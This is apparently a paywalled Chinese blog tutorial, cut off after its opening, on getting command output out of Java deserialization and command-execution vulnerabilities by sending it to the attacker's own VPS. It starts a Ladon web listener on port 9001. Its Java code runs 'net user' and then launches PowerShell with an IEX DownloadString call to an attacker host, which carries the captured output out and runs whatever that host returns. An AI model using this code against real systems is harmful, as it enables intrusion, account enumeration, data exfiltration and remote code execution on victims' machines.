简介
在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。
启动WEB
Ladon web 9001
JAVA执行命令
javac main.java & java main
注意:get提交换行符需换成别的字符
import java.io.BufferedReader;
import java.io.InputStreamReader;
public class main
{
public static void main(String[] args)
{
Runtime runtime = Runtime.getRuntime();
try {
BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
String line=null;
StringBuffer b=new StringBuffer();
while ((line=br.readLine())!=null) {
b.append(line+" ");
}
System.out.println(b.toString());
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};
//java.lang.Runtime.getRuntime().exec(cmd).waitFor();
java.lang.Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}
}
}

返回多行结果
只返回whoami结果没什么问题,
本文介绍了在JAVA反序列化漏洞中如何实现命令执行并将结果回显到自己的VPS上,避免依赖外部服务。通过启动WEB服务、处理多行结果、使用BASE64加密提交以及解决中文乱码问题,实现了完美回显。文章提供了一个例子,并给出了相关代码和工具下载链接。
最低0.47元/天 解锁文章

1238

被折叠的 条评论
为什么被折叠?



